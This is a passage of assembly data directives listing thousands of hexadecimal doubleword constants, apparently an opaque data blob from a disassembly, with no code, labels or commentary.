		dd 0AC6F4A80h, 8A4A8B2Bh, 69A2E31Ch, 0DF4951A4h, 0CD5BF5C8h
		dd 81FA0A48h, 0BFF983E7h, 808CE5B6h, 6D85E2D2h,	0CB04F99Fh
		dd 66C2A7C0h, 0F23F6CBDh, 3C924C6Dh, 7C2BD06Ch,	7DE0A2A1h
		dd 0FF7C603Eh, 0CBBC3339h, 8AA7C68h, 108A9979h,	4CB02FB7h
		dd 0B8A665D6h, 0B0C8F4E0h, 1945423Bh, 2240DA94h, 262C976h
		dd 0F8DC7CF9h, 28B8B84h, 0FA8A0ECCh, 0BDBCCCA7h, 33CA6E8Eh
		dd 0A51E16A1h, 1FD0CEC1h, 0D7DB77C3h, 0BAC86DBAh, 0C84C71Eh
		dd 9012CA3Ch, 486CC273h, 763552B5h, 1B8E3510h, 0C4060B14h
		dd 6C6BC19Bh, 3928DC6Ah, 3EADF0EDh, 2E04885Ch, 9ADB7428h
		dd 0F22A5178h, 0BC809F36h, 82075DFDh, 0C6C19E84h, 0A8771F6h
		dd 149668Fh, 859511FFh,	6C93C358h, 4694D8B2h, 0EBC14083h
		dd 0FE0DCE2h, 9C5DB440h, 0E221E121h, 0B188C686h, 7E72884Fh
		dd 0ED5BD517h, 0C473A18Ah, 99422B95h, 351FFA46h, 0E97C0DC8h
		dd 0AC3C06A4h, 266AF880h, 1B44ADDCh, 0B54B6A8h,	0DF26D1CCh
		dd 0CC228796h, 50DC2F7Fh, 0A0FD2B70h, 41921CF6h, 7F70440h
		dd 9B523096h, 368AFC77h, 82477E06h, 7A5487AEh, 5BDC7714h
		dd 0ABEAA9EFh, 1B8A08CAh, 0ECAAD478h, 6FA2AF66h, 90ABE975h
		dd 0F1A038B0h, 60125A88h, 62BB15Ch, 26B42ABDh, 84B7D6ADh
		dd 0BF974E04h, 543DEE04h, 350478C8h, 0ACDEDFE4h, 52134C1Ch
		dd 0DA70FA03h, 0DF74CACDh, 0C66AC1A1h, 0EBF3EE07h, 9A08B372h
		dd 91514168h, 7415ACAFh, 688B0C2Fh, 0FB2DC39h, 7DAD7A8Dh
		dd 0A13EBDCCh, 0EDA61300h, 89A7D569h, 0A12423A1h, 0D688F608h
		dd 237C44Fh, 82448482h,	0C6919084h, 0ABE8946Bh,	67A2D99Dh
		dd 0D848BB44h, 0D4244B73h, 0F53CF07Fh, 40B316A5h, 0F9B3C8A5h
		dd 0E95A289Fh, 856659B2h, 85751AAAh, 156F23C0h,	0B72ED450h
		dd 1DDEC147h, 1A8B9155h, 8AA58FA7h, 0F8485A3Fh,	56557B2Ah
		dd 7D51A014h, 0DC3BEDFCh, 60E12D1Dh, 40347E73h,	184D997h
		dd 0BE77544Eh, 4EACAA9h, 0EFC3808Ah, 8164E7A8h,	0A7B1F045h
		dd 677E05DFh, 52985E9Fh, 63B7731Dh, 619751Ah, 17C568C0h
		dd 0C7C575D1h, 0AE895589h, 0BFAAA093h, 0AEB0974h, 3BFFC706h
		dd 2094F55h, 4F04CC55h,	0EA6324C1h, 4C06820Eh, 87518AABh
		dd 0C51B2FD1h, 0A4276BAh, 11820121h, 1CF40D44h,	1AB103A7h
		dd 0FD3861D6h, 0B88670EFh, 35F8FAB8h, 1107BD71h, 8485293Ch
		dd 0FD04F2E4h, 0AFAF6626h, 0D1C270B4h, 765ABC7Eh, 0AFF5C615h
		dd 0F0C42116h, 0F9556277h, 0DA5BBAE1h, 5A8AF22Eh, 69939C98h
		dd 3A680CBBh, 42555469h, 4E4CA2FFh, 6472C3C5h, 8E3A297Ch
		dd 325A78Dh, 521D802Dh,	80BEC6C5h, 2F8351C8h, 0CF16B243h
		dd 0EBE23B06h, 77CA93Bh, 0A6806FBFh, 148F2417h,	0A9AA9C7Fh
		dd 0F05031A4h, 50502E9Ch
		dd 40B88B40h, 0C6224092h, 7F391D0Fh, 93F48BFEh,	2EB1C5EEh
		dd 0BEF1C26h, 391A2C5Fh, 0D93CD0D4h, 0D1227CDAh, 0AA425FE6h
		dd 0C5170FECh, 0DA8FDD3Dh, 5D2E8877h, 7C1704A4h, 8519D8AAh
		dd 0FA5301F9h, 3167B74Ch, 1F29078h, 0A69BC442h,	0FF3F81FFh
		dd 0C6A29C1Eh, 0A10198F9h, 0CC5543A0h, 942B4E05h, 4D3E30D4h
		dd 17DFA861h, 2A604530h, 5855F404h, 8D264992h, 0A245D648h
		dd 9981448Ch, 0A14B1140h, 0DF40A649h, 26D57794h, 1F4C3871h
		dd 56F006FCh, 3E7E30A4h, 0AFBEE6FAh, 3B881034h,	5B38C64h
		dd 87E7F9Ah, 2915B391h,	631CE0h, 650980A8h, 986890h, 6BA74238h
		dd 145CA92Eh, 3207F8B8h, 3E989275h, 0FA5CD6B5h,	209E09C8h
		dd 7BE14B42h, 97C8BB7Bh, 4EC2E5F9h, 4ACB22Bh, 14DC92D5h
		dd 5310F47Dh, 4585461Bh, 4CB92Eh, 0D43397F6h, 0E8A3E7E5h
		dd 557400E3h, 758239D0h, 0CE3B6D45h, 0C0AAF051h, 120F8C52h
		dd 0A2A4270h, 71E7DB58h, 29080DB9h, 294E7F85h, 0FED806Eh
		dd 0C54060FAh, 0A6A3EF1Dh, 6A666791h, 866235C0h, 7A0E1B74h
		dd 0F95F20F4h, 8183269Ah, 0F22E71ADh, 6D05489Dh, 1ADC717Ch
		dd 1AB85C5Fh, 3EB32660h, 16B6D073h, 51428D0Bh, 8823FFC0h
		dd 973C29D9h, 8EA530ABh, 4D17A127h, 518BC701h, 0A54E06A1h
		dd 6539F4Eh, 6243A009h,	0A9B9327Dh, 6862FEA3h, 0A73111C8h
		dd 341762A9h, 510814C8h, 0D9E0D725h, 1752FA3Ah,	10E3368h
		dd 7CAF1830h, 202FA133h, 68EAF86h, 0E474C103h, 2340D214h
		dd 0D71521F8h, 1AB2F84Bh, 58700FC5h, 0BD658175h, 6BCB8440h
		dd 95A89B20h, 0DC8D17C7h, 54452429h, 9004C498h,	521C2C13h
		dd 19D234FCh, 0CF179BC4h, 0FED87EE3h, 40436CF0h, 0BFC4FFADh
		dd 0E50EF104h, 13AC7D6h, 73B8A782h, 23740603h, 86F77B60h
		dd 0A87EF41Dh, 7CFAC9Ch, 0F57DFB12h, 0F5DED6A1h, 0A178756h
		dd 0FF0A82Ah, 442C5824h, 0EC7DEEC3h, 251CBF3Bh,	588AB529h
		dd 0F9094920h, 0C1508C16h, 6620C545h, 7756D551h, 31F91160h
		dd 44BE0E49h, 0CB6E585Ch, 836DFD8Ch, 1E12152Ah,	53683CBFh
		dd 38D9B1F0h, 301B865Dh, 0CF4F8AB8h, 22A37DA6h,	2874F897h
		dd 5D6615D0h, 2BACCD87h, 94D38EFEh, 1727EB6Bh, 8BAAC65Ch
		dd 77D86521h, 0DD6550A8h, 0A213F4A0h, 7340F5D7h, 0D7D6E0A7h
		dd 8725C3BBh, 0ACE759CAh, 206B66C1h, 110E4151h,	0CDBC03BBh
		dd 3F31B515h, 6580202Ah, 0C0E1A55Bh, 4A39A560h,	253B7C49h
		dd 0E4682A01h, 0C638615Dh, 652E15F6h, 6D222667h, 7105721Ch
		dd 0B9D042Bh, 2811D121h, 0F2C7E3ACh, 338308ECh,	12C35867h
		dd 995C0548h, 135A9901h, 539ECBFEh, 0A4E2B489h,	0FC295193h
		dd 0C516B17Dh, 61F4DA6Bh, 4DF1A45h, 0A8713C88h,	4D0A94A4h
		dd 562F8272h, 1605F5CAh, 6FF2483Bh, 41C9630h, 0EB1A3CC3h
		dd 448C44E8h, 63542D1Ah, 3420291Eh, 506F1416h, 0DD66C886h
		dd 130A2316h, 5D0B260Eh, 0C5A743CFh, 5AF0DA5h, 83FE32D5h
		dd 0E53B3BDEh, 4ADA1838h, 510B4C02h, 4156A390h,	10DB43BBh
		dd 455F5F61h, 79B87F28h, 4753BAC7h, 4D56272Bh, 0E87493DAh
		dd 0D8FE8B3Ah, 93D7E70Eh, 7569DB37h, 0FBB7166Dh, 8BCAC3BCh
		dd 255A27C0h, 38DABA19h, 0FAD5AE09h, 8A0B69A5h,	25D21637h
		dd 0D8B9C363h, 135304A0h, 0A0E96E4Bh, 444500A4h, 4E64B89Fh
		dd 7D8A762Ah, 0D2804673h, 0BE725D1Dh, 497F2D02h, 0C5724066h
		dd 8F3FE1E2h, 0FA03A78Ah, 0AB88D4B5h, 517783DCh, 9DAF3183h
		dd 20BAD64Ch, 0DEC8B54h, 8783EAC4h, 0B1025E9Eh,	320922BAh
		dd 0F82170C0h, 841742C1h, 0A3FA0BDAh, 550151Fh,	0F230F8F8h
		dd 592A26Ch, 3055F090h,	43B2B390h, 0A4BE1DC7h, 2B341F8Ch
		dd 2792B042h, 0CDD29400h, 95051AC7h, 0E8EF5A18h, 521424C2h
		dd 5F829E04h, 0D21A8934h, 9F08BC5h, 81256B0h, 21418449h
		dd 0EB13C411h, 0D0E0B866h, 206C0BD2h, 63B69B82h, 3631AD1Ch
		dd 62283C85h, 2CA6DDEDh, 4EFBD287h, 9748DE19h, 0F1DC7060h
		dd 0CD1941ADh, 0BEE71FA6h, 4893DB56h, 0FC01E06Ah, 8A5E1C51h
		dd 6EF0F3DFh, 0E4F06417h, 39DD3064h, 738C29D6h,	89C3629h
		dd 5CA4B595h, 3BE5A902h, 207AE281h, 0BDD15DA4h,	0DD3657Dh
		dd 240762Ah, 0F350DFEAh, 0BAC9074Eh, 0B8AB5E18h, 0FD7957AEh
		dd 0FB20910h, 37C258A4h, 1047F9C4h, 259C6335h, 427CFFABh
		dd 26B0565h, 7D74A089h,	1773E303h, 4B2767B0h, 5D974DC7h
		dd 25F6250Fh, 0AAA3F53h, 74501448h, 0CE229D09h,	4892A27Ch
		dd 0CFEF18A0h, 3E3340BEh, 33EE0950h, 6913BFC0h,	1208594Ah
		dd 621480ADh, 73F1FDCh,	0C49BFD8h, 0DAF98E25h, 58AE4C14h
		dd 0CC14C074h, 0DA520289h, 4E0F8AEBh, 5181D05Ch, 17468C0h
		dd 52C213D7h, 0A5C3754Fh, 0CA21B2AAh, 7FCB4A02h, 59A88E41h
		dd 28ABF657h, 0E4038462h, 7ED0C507h, 0FD433F48h, 0DA63FE21h
		dd 97EAFC83h, 0A349EB3Eh, 3AF91A73h, 374EC8FEh,	8A1D7A45h
		dd 1744FE30h, 2B680A6Ah, 0CA1F94E3h, 0C4F49F98h, 703587CDh
		dd 540AE296h, 2C067D1Bh, 4DA5B32Bh, 0F52C9CD0h,	0A0400E6h
		dd 10301FAAh, 4B899A56h, 5020C997h, 0F0BDD294h,	6B9784C3h
		dd 1DEE47F4h, 94123B20h, 3E364E3Dh, 2D5D3DD8h, 4AC09BD8h
		dd 0D04FF054h, 0EE7CC063h, 2D02B7D3h, 122175Bh,	0C425C347h
		dd 39DA4555h, 9A2796E0h, 448E0D5h, 91848273h, 53333CFAh
		dd 17AFAB2Ch, 0B2C02A06h, 91AB3204h, 0FA94E70Dh, 1B2E9179h
		dd 0CE20655Fh, 3194C30Dh, 0EBB05ED0h, 1E9C25EBh, 965FC075h
		dd 0D33B2261h, 0FCB92934h, 648CBA4h, 9C444980h,	0B7EC00E0h
		dd 70CDFF34h, 1334BF73h, 9B2A481h, 0B1389460h, 23062DC8h
		dd 0CDADF1ECh, 7DC7C283h, 79BBA1D8h, 989EECE6h,	0EF412F06h
		dd 303CF282h, 0ED5F19D9h, 90FC18C2h, 9D2F7E61h,	0BBD73ABCh
		dd 0B522B2C9h, 0B9E35008h, 0E6539A96h, 0F0B85A06h, 92FA2E97h
		dd 52F612E3h, 53A22261h, 447B1767h, 4880063Eh, 4483C091h
		dd 49AB1292h, 0DFC1A5D8h, 852E0314h, 0C72368B2h, 151714EBh
		dd 6527E5FEh, 0B52F65Dh, 20931AEBh, 0FC1B63A4h,	0F881DDA2h
		dd 69F7875h, 23323FF2h,	9511A520h, 5D8D4A76h, 90212A6Ah
		dd 0B9016A15h, 18DBE125h, 0EE961B28h, 0EFE38046h, 2D1D0E4Ah
		dd 2E57CA0h, 0D1DD35A3h, 0C7E1D53Ch, 0A6DCC071h, 410557F9h
		dd 0D845368h, 0DA1C268Eh, 1D51215Fh, 7E172662h,	0D010B349h
		dd 8E49F2B3h, 0A31C580Ch, 0FE442EAAh, 6AF15FF6h, 34BCD7E9h
		dd 0C2E6B85Ah, 8255748h, 4252A751h, 0B649DFB1h,	55AA3D9Ah
		dd 87ECEBB9h, 0DC826C95h, 3D97811Dh, 3D5CC414h,	45072D0h
		dd 63D7921Fh, 6E02C726h, 0E02C3F15h, 38578047h,	0FB71BB80h
		dd 0A873BFE0h, 0E1292897h, 87202137h, 40C617DBh, 3A1FBAFBh
		dd 30E8A6C8h, 6D1B0FE8h, 0D67D1E50h, 0E60C4B17h, 14A45A1Ch
		dd 0A062EBB6h, 0CD0D7DD1h, 0BE87EAD5h, 211C129Ch, 0E49233ABh
		dd 0D8B5AA9Ch, 983EF339h, 1F6AF6E1h, 0B97B0948h, 9377CBh
		dd 72428EF0h, 0F4D484ECh, 0B91501B1h, 4295382Ah, 575A3C58h
		dd 3283F9B8h, 1FEEBCFEh, 0AE9D3ECh, 0B8FE0A08h,	0A94AA13Bh
		dd 7675808Ch, 0FB0A7795h, 85C0AC0Ah, 7858521h, 0B0BB917Fh
		dd 86CEFE30h, 2F3D8062h, 0D7461A02h, 9DF59E00h,	4B5F07F9h
		dd 72FDEFB2h, 0D9272618h, 65075CC1h, 21383080h,	0A629F8EAh
		dd 0F9E21F7Dh, 0A11DF4Eh, 0C1475432h, 2C979EAEh, 1E8C0028h
		dd 25BE584Fh
		dd 0F7205B06h, 8781BAF4h, 4F7209A0h, 111244A7h,	0C9A228A6h
		dd 49747D3Dh, 8A609854h, 0D3DCF71Ah, 86449123h,	72487A29h
		dd 0B149874Fh, 0C6149074h, 74EB7FEEh, 0D0559F0Bh, 0B96A3891h
		dd 62D4C481h, 3463881Ah, 0C2A18EB1h, 0AF08AAC5h, 5521722Ah
		dd 3AB1397h, 17356777h,	4519F0Bh, 0EFB477F1h, 947E682h
		dd 905D5E45h, 5D2550B8h, 4490E108h, 6C26CE9Ah, 2887EC88h
		dd 38BF7C90h, 6F92E538h, 0E9AFCBB9h, 0C4BD7AE2h, 0AD834068h
		dd 80B87D30h, 57DE980Ch, 0DE88BAFDh, 0E433449Fh, 0CEFE23A2h
		dd 98EF0CBCh, 617A4A83h, 5619DE44h, 3E2825BAh, 1356E4F4h
		dd 20C7EAF4h, 9ABA71A7h, 50455779h, 7B3BFAADh, 0DA9055CBh
		dd 827B395Dh, 606B5563h, 2557B877h, 631396C8h, 7A4AD740h
		dd 1FC9165Eh, 355A54Dh,	0DF0C7DAAh, 0F74A0BB9h,	0AB502C60h
		dd 0DE7D555Ah, 5DD85D0Fh, 0F048477Eh, 711E3138h, 3FE21FD6h
		dd 9898BAEFh, 17176EEDh, 0DAA098E8h, 0CF4B8FF1h, 55955D12h
		dd 0E1B8FA43h, 9895794Eh, 0AE2FAC62h, 6A7980B9h, 0A9845F91h
		dd 8B08FB00h, 41DFC4E6h, 0AC33AB0Eh, 753D913Ah,	0AEE78F01h
		dd 104C9212h, 5B40780Bh, 94344C4Dh, 346FC04Fh, 43702201h
		dd 137D6669h, 0FC1DCD18h, 0C84373CFh, 0A624DD0Ah, 0C797EA76h
		dd 8CA2370Ch, 307CC22Ah, 0F96B62D1h, 0E10776Dh,	52D8529Ah
		dd 8C2763D4h, 0C9DA8517h, 992B6D5Fh, 5D752174h,	0DC80FC84h
		dd 2109380Fh, 1298E2F3h, 85FF379Fh, 21B271Ah, 0B1377D8h
		dd 0C6D44567h, 70A8FEE9h, 525CB781h, 8A783E19h,	0A0BFF9D3h
		dd 21A8C19Fh, 991044A4h, 54A3528Ah, 0E9C6FFC0h,	0D410286Bh
		dd 5D3F40A8h, 92658CAEh, 8F8C2D5Ch, 5FCF719Ah, 3804F5D1h
		dd 0BF6ED301h, 0D6D1C823h, 6C5910D5h, 8FA69B1Eh, 0CEC1B12Eh
		dd 0EF022573h, 0E41DA923h, 0F8B6AE0Fh, 0FD5DFAA8h, 23426229h
		dd 0A5A00C35h, 85ED1A0Eh, 8522568Fh, 540C959Eh,	9568B8EEh
		dd 36FCC8DBh, 1F0D6854h, 0D031DBB8h, 0C194D4E0h, 51DE1B40h
		dd 74411B45h, 8115B3BAh, 31A2B13Ch, 116C0C90h, 14A600ADh
		dd 0DB94A82Bh, 756302C1h, 0E5716CD1h, 68C6AC59h, 9E227C33h
		dd 0C799392Ah, 73423B1Ch, 0BF555F0Ch, 42CBB774h, 9C46935Eh
		dd 2A06E907h, 61DC1FC2h, 0F27958A1h, 0B08F28BBh, 0F4AF537Dh
		dd 8B26A084h, 0EE826E1Ch, 0A50FD3D5h, 75327F73h, 233FE7D1h
		dd 9E050334h, 43D78E0Fh, 9B2C8D82h, 950A59E0h, 36BBE2DFh
		dd 7F4083BFh, 7AB3252Ch, 48D1FFD5h, 0A47020B9h,	2BF7EB06h
		dd 5D173609h, 92A2E103h, 206991EFh, 0C5334B43h,	982E69DDh
		dd 0DB57173Dh, 876AA0CDh, 6EB2EFB3h, 5C568157h,	38F0DFFFh
		dd 5FCB948Eh, 3F15508Eh, 0F1781491h, 0A38BB60Fh, 27565546h
		dd 79D9A306h, 0BC7D6E00h, 1A639AC2h, 0CA4638C8h, 0ACD3A15Fh
		dd 2F8DEAFEh, 40F898F6h, 18BA7487h, 1CF9A049h, 0D127FE58h
		dd 5F180DE4h, 0F1400809h, 80A1A747h, 0C9A0A855h, 26577D2Ah
		dd 82AA76FAh, 0B70D3E06h, 0D4A4AE77h, 555507DCh, 90460E9h
		dd 3EBC7677h, 0FE29C844h, 0C3A5532Ah, 3160A3AEh, 93E4700Ah
		dd 4E7022FBh, 89DFE052h, 33C3FD75h, 24157Dh, 1A32375Ch
		dd 2E0A4F11h, 0F97E87E1h, 58721CBh, 2DF42A8h, 3036D3F6h
		dd 2EFA61E4h, 8E771C79h, 85E44C0Ch, 0A94623EFh,	55555680h
		dd 0B657DD59h, 61795550h, 6AED61D4h, 0B5AAF738h, 49D6D7Ch
		dd 0F80BFB8Fh, 0E2F8BCCDh, 2A8F4EF8h, 6E3DFAD0h, 0FC62BCB3h
		dd 74021BEFh, 245EA85Ah, 0BC779596h, 1F547568h,	9D5FF071h
		dd 0F3504B4Ah, 0B0EE7F4Eh, 2E5D3762h, 5E19720Dh, 0DFA121B8h
		dd 46F584Fh, 567FA3B4h,	658AAEC1h, 43C0F2A1h, 48D7C999h
		dd 69446194h, 2021C17Fh, 44AB0228h, 8DFD8501h, 68091E04h
		dd 0A4712660h, 8B4F0390h, 8552BEA7h, 0CEC3AE17h, 37F0665Dh
		dd 47CBC110h, 201C4CDh,	2AEFEFD6h, 0AF9486AFh, 0AC1F538Bh
		dd 57D3C420h, 11080338h, 7450F1AFh, 0D9041AECh,	19BA2293h
		dd 48401727h, 6244454Ch, 30FA7A1Ch, 0B75A8907h,	1803E310h
		dd 81E27923h, 0A2C4D285h, 486D356Bh, 717F84D6h,	0E9105502h
		dd 0BB5BC58Ah, 0B573AB38h, 0C1D8D120h, 72F85D65h, 9F736C15h
		dd 0D8CDB477h, 0AFC54877h, 0D59E2A0Ah, 4AA0281Ch, 0C3653414h
		dd 3D862129h, 0DC294975h, 898253C5h, 3C068329h,	5DDC3C3Eh
		dd 0E9589ECh, 5F975770h, 50AD7509h, 6BE25FA1h, 0A8421D5Fh
		dd 0A174938Dh, 0F9DB3013h, 7D9FA0BAh, 0CAC5395h, 520C48A6h
		dd 3D7D22A3h, 7DBB5D2Eh, 0DA0DBE91h, 70B4A92Fh,	5BE4026Bh
		dd 68471E10h, 3E0BFCDh,	9A065101h, 0ED2F14F1h, 80F33014h
		dd 227E934h, 7D0F0440h,	8C18B4DAh, 0A56EC174h, 583D5105h
		dd 8BB2BA4Dh, 230C0640h, 11AF7B79h, 3B82226Eh, 0A843D0C0h
		dd 0E26981B1h, 0AFA778CAh, 8C0D3045h, 80079534h, 687EFE09h
		dd 7BD792F0h, 80A6FAE6h, 0E46303C5h, 0D9A726EBh, 0A5D06E58h
		dd 0F1EB7758h, 0DDDEC1AFh, 7D58F414h, 0E302097Ch, 82B6F14h
		dd 310CF29Fh, 0AB42C82Dh, 0F2BBC38Eh, 5712360Eh, 8818C664h
		dd 0C2052316h, 0D4101ED4h, 0E24D6650h, 0A8BA31B5h, 1762EB51h
		dd 0B22CAADDh, 3EB82EFBh, 145747F7h, 0F27AB43Eh, 0E18AD050h
		dd 8EDF2CAh, 282BDD99h,	81553360h, 3DC0E879h, 0B2D7E46Eh
		dd 99628422h, 4C0F1746h, 0B63EE911h, 1448E565h,	24AE0412h
		dd 848E4212h, 110FB170h, 4431112Fh, 7D2CB774h, 0A01A3885h
		dd 84CBC7DFh, 49521082h, 0AB1A2AABh, 0A0C7A57Fh, 0A36F458Bh
		dd 4A6714DBh, 2C5EAB67h, 744BCDA7h, 0AEDC5C54h,	46273FD1h
		dd 574F6A98h, 9A131455h, 917511B9h, 80BB1DDEh, 3E34774h
		dd 97C691E9h, 2BEE284Ch, 268DF72Ah, 21D03805h, 355F4A43h
		dd 7FE13E51h, 0DEECE97Ch, 3974A214h, 7689A683h,	2FD593F5h
		dd 67D7148Bh, 0E0063255h, 4630A068h, 6DC22CCAh,	9982BDBCh
		dd 48A0097Eh, 0DD6347E1h, 1803CBEAh, 0A0B4558Dh, 3C5641Ah
		dd 0BEED0103h, 5A15BCEEh, 580CD7AEh, 73D64B78h,	60240BFFh
		dd 0D00A5C49h, 0F7CDDF76h, 0B78A4EE0h, 0D1948D7Ah, 2FCB0405h
		dd 58A2826Eh, 1114BAC6h, 0E840F765h, 0AADB80E6h, 0CE0E26A8h
		dd 7ECAB2CCh, 64AE2BAAh, 0D2CB1D81h, 43B5ACECh,	0BF6F4741h
		dd 944ABB2Bh, 41399755h, 0D446EF90h, 0F1618455h, 0C4A8BB8Eh
		dd 0CC3F8D2Fh, 0D864256Ah, 887DB681h, 183AA301h, 7411D2C9h
		dd 310CC623h, 34408CECh, 0C9FFBE0Eh, 2F86D01h, 63F8116Eh
		dd 328F00h, 1080C47h, 956B3153h, 0BCA6A2A2h, 0EB0996BFh
		dd 6F4E811Ch, 48840696h, 0EDD1CCF1h, 0F40A339Ch, 0DC040AE0h
		dd 6C0D7423h, 0D52951A7h, 2852F96Fh, 7773E880h,	7468BD10h
		dd 30BB29A7h, 1D9565CEh, 0BFB628h, 0D2210579h, 0ABAA500Ah
		dd 0CE8117F2h, 595D2C14h, 3B155A8Dh, 0BEC7DAB1h, 7D68B57Fh
		dd 1380F9AAh, 45ADC658h, 0E25D7220h, 150F33B7h,	412C3DD6h
		dd 0E6265E9Dh, 137E050Eh, 0C3598ED7h, 0EA20A5ABh, 74136DCEh
		dd 0E59EDD4Fh, 83BF3033h, 4F075A85h, 0A7212D9Eh, 746BF150h
		dd 57CAC990h, 79FEAC91h, 9185E0BCh, 5EE0EFAEh, 6CFF18A1h
		dd 83B22FF5h, 559288Ah,	5EC88026h, 0E99F5C55h, 0E51716D7h
		dd 90DB49DEh, 95866CAh,	9C54943Fh, 494F72B4h, 0D216100h
		dd 7DDB4814h, 0C7427586h, 0CDBB0D1Dh, 5E207809h, 0A4C42C91h
		dd 7F1F98DBh, 1F46C874h, 0FD5ED6D5h, 0F185F282h, 754B7FEEh
		dd 255347E4h, 8F7836F9h
		dd 0E88CAB30h, 5C75253h, 696B625Dh, 53EABF91h, 9177B3D5h
		dd 914832Ch, 377076E2h,	23F75B48h, 1BF68C61h, 34CC4A43h
		dd 8C5BA992h, 7F2AA435h, 0FE295595h, 0E17070A5h, 0ADFD0487h
		dd 7C784324h, 0D79C5F30h, 8C5D455Fh, 78D79C95h,	24F1670Ch
		dd 8A844B0Bh, 8D1BEAA0h, 516FD324h, 8AF2D506h, 0A475CE5h
		dd 603552C7h, 0A0F01BA1h, 4AC387FDh, 17C4580h, 25679C05h
		dd 0D687FD9Ch, 82C9F5BEh, 5FFC2711h, 9588F6E4h,	145145C7h
		dd 7F2EC4B1h, 0D284E851h, 0A1479055h, 6942756Ah, 2AB2317Dh
		dd 2ACBB911h, 0BBE4E45h, 0DCACAE1Dh, 522EC26Dh,	97592CCBh
		dd 38D91F2h, 2A0DA5AAh,	738AA342h, 379F16CDh, 658676D5h
		dd 98F193D6h, 98F9D1Eh,	0BA2EA672h, 8BFFA82Eh, 0AECAA460h
		dd 25DDCC63h, 0A35FB2A3h, 803CEBADh, 0AB7A5D9Dh, 5F612703h
		dd 0FECACA19h, 0D63554B3h, 0DEC8CDDFh, 0BABC4AB2h, 0F650F310h
		dd 123DCB38h, 94B20187h, 76B78D5Eh, 14288C8Dh, 0AA4D884Ah
		dd 0AEABA0EFh, 0DF66D673h, 35976E2h, 445D067Dh,	479A59BBh
		dd 34FC5C7Fh, 0A8CAEC02h, 53980EF1h, 5617AB15h,	0C9233DD2h
		dd 23458ADDh, 0D2B31609h, 6D564AEFh, 7B16FAD7h,	62D77F50h
		dd 0D1601E8Ah, 45F7573Fh, 69A1F218h, 7F51EFFCh,	7487B3Ah
		dd 0A4B830ABh, 0CFE3D75Ah, 0EC1AB7BDh, 0BA99C3E4h, 0F28E2E75h
		dd 5FE879BDh, 35E1ADA0h, 2A224D9Ch, 0AA444F88h,	76019032h
		dd 98409F45h, 0B1B5B017h, 0DA07924Ah, 221F8F87h, 0F8E14033h
		dd 445A5C5Ah, 0E94E482Dh, 685A09E6h, 0BE71F5A0h, 0C7441236h
		dd 0D7CB42D1h, 9396B969h, 0AFF1EC1h, 4A1C3F01h,	0DB09DAA1h
		dd 0AA64127Ah, 549456ABh, 7C6F4F38h, 0F2F94014h, 0F21715C8h
		dd 5837049Dh, 539915F8h, 1CB8EE79h, 7C5BF36Bh, 0E03C120Eh
		dd 1351B73Ch, 877494B9h, 0FCD08633h, 64888939h,	11C2B460h
		dd 6362414h, 28AA2051h,	1468F206h, 27946211h, 1D3138D0h
		dd 0CA8CB951h, 79562D6Eh, 1D0F7CB2h, 877C5443h,	0A4C37892h
		dd 3373D86h, 6D0BBCDEh,	2A950F36h, 555C1AA6h, 5D378ADEh
		dd 0B450F46h, 56731946h, 217609E7h, 419C360Ch, 1FB17F58h
		dd 0FA3ABAD7h, 5299C8FDh, 20A8B224h, 154A0359h,	1C2E539Ch
		dd 360FAE90h, 5262B0DAh, 32A38710h, 3363F1ABh, 0EFE04F8Ah
		dd 38E0D7D2h, 74810A75h, 66D1394Ch, 3C066A8Eh, 40153471h
		dd 132C0EA5h, 10340AD1h, 5300F7A5h, 877AC440h, 0AC7A0B2h
		dd 0C36F9658h, 813C2B1Eh, 6F8FD759h, 0B1B893Bh,	52C7FA36h
		dd 9D83F2C6h, 0EE5D49F0h, 0EFC4843Ch, 731EF7B4h, 0D3B6E60Eh
		dd 0F7C6AF6Eh, 0B90C62Fh, 63ECCB22h, 28D81178h,	1728C57Ah
		dd 9B0BA6D2h, 0AF65A77Ch, 0FFBB9104h, 155FFA47h, 0A57A2103h
		dd 7468A2EAh, 0F8702E4Ch, 908CE3B8h, 40B3E093h,	0F9C9BFF7h
		dd 0A5F9D110h, 0D860F02Fh, 9D52EBDEh, 4972B285h, 7816BBF4h
		dd 0FD94C50Ch, 0FA107A59h, 59E2C59Eh, 0F0E58DF0h, 0C01450C2h
		dd 0BA429B26h, 94375274h, 7D7994D8h, 35A2E040h,	0AF03E0D7h
		dd 0FF6841E4h, 380911F6h, 0E2AB7E0Bh, 0EA9957F8h, 0EB2AA368h
		dd 976C5CA4h, 0B90426B2h, 1242C0B8h, 0CA55E34Fh, 1C892B90h
		dd 0A4889607h, 0F7441E24h, 0D4CDD8B5h, 1DE6E2ACh, 11AE0C5Ch
		dd 87EFF99Eh, 87E46E02h, 83306A32h, 39CDCD44h, 54DC55E9h
		dd 0BDD44CFCh, 0BD0AD5D3h, 28224240h, 368AB8ABh, 0E3CBEFF7h
		dd 5B317B23h, 0C4D43EB4h, 0F500B4B9h, 6F9B58C2h, 6B5FB063h
		dd 1711E537h, 0EE912483h, 0EA4C9DF5h, 448FAC0Fh, 7D69A8FBh
		dd 0E50AC424h, 240ADF4Eh, 9349FB50h, 2CD7B2F9h,	0FBCDFE7Dh
		dd 4174491Bh, 7D754283h, 0E5418AB5h, 0DA822ADAh, 0C0413CF5h
		dd 0C20A31E6h, 7651C4D1h, 25F2E558h, 1BBCAE95h,	5CA58499h
		dd 314BACEAh, 175186ABh, 0A942B49Fh, 517753E4h,	0F02A15CEh
		dd 0D1CA2FC6h, 0D8C7CDE2h, 0AF5C822Ch, 50449BBh, 0E1B17D86h
		dd 81E5A61Bh, 4AEEFF1h,	0D7097FC6h, 950FAB20h, 0AEA63EAh
		dd 0C677502Fh, 0EB83708Ah, 877EFFA1h, 0A54FBBF3h, 27BEE550h
		dd 38700425h, 55882AAAh, 0B6135B1Fh, 285619C5h,	0FBF50C82h
		dd 5CAD6A6Dh, 0F6884650h, 57C8241Bh, 0E8C3CF11h, 0ABE0B6ACh
		dd 0C9C15B86h, 17FF0260h, 9212A75h, 0C396BBB8h,	5B551556h
		dd 8944278Ah, 23A0FAF2h, 0FEEDDF6Eh, 42F3D861h,	0E0927414h
		dd 6E54D6ABh, 88452C7Ah, 2A6EA84Ah, 6115D76Bh, 0F45D9C28h
		dd 0EECD7DE4h, 12A1F24Ch, 92BCECD1h, 0F63E2AAAh, 0A559BFF2h
		dd 0A60DFD32h, 0D610740Eh, 8A990B55h, 9CCB2EB3h, 612925F5h
		dd 16544571h, 87D45A69h, 462622B2h, 5EB8E068h, 0B8B47A13h
		dd 504AABCh, 9CD72B8Fh,	0E912E1FEh, 0B9246297h,	1180F4E0h
